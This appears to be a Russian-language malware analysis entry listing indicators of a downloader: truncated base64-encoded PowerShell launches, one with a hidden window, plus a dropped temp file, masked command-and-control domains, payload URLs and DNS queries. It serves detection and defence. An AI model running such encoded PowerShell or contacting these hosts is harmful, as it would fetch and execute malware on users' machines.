Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAGkAdABlAGIANgA4AD0AKAAnAFgAOQAnACsAKAAnAHYAdwB5AGwAJwArACcAMgAnACkAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAdABFAG0AcABcAHcAbwBSAGQAXAAyADAAMQA5AFwAIAAtAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1968
- %TEMP%\988297.cvr
- 'hz##chi.com':80
- 'in####bericos.com':80
- 'in####bericos.com':443
- 'ma###ineltd.com':80
- 'ma###ineltd.com':443
- 'di###adayal.com':80
- 'hh##ao.com':443
- http://hz##chi.com/css/ia8/
- http://www.in####bericos.com/data/FMh/
- http://www.ma###ineltd.com/vfjg4wg4/Fz/
- http://di###adayal.com/cgi-bin/c3h/
- 'in####bericos.com':443
- 'ma###ineltd.com':443
- 'hh##ao.com':443
- DNS ASK te##lh.com
- DNS ASK hz##chi.com
- DNS ASK in####bericos.com
- DNS ASK ma###ineltd.com
- DNS ASK di###adayal.com
- DNS ASK t-###inity.com
- DNS ASK hh##ao.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAGkAdABlAGIANgA4AD0AKAAnAFgAOQAnACsAKAAnAHYAdwB5AGwAJwArACcAMgAnACkAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAdABFAG0AcABcAHcAbwBSAGQAXAAyADAAMQA5AFwAIAAtAG...' (со скрытым окном)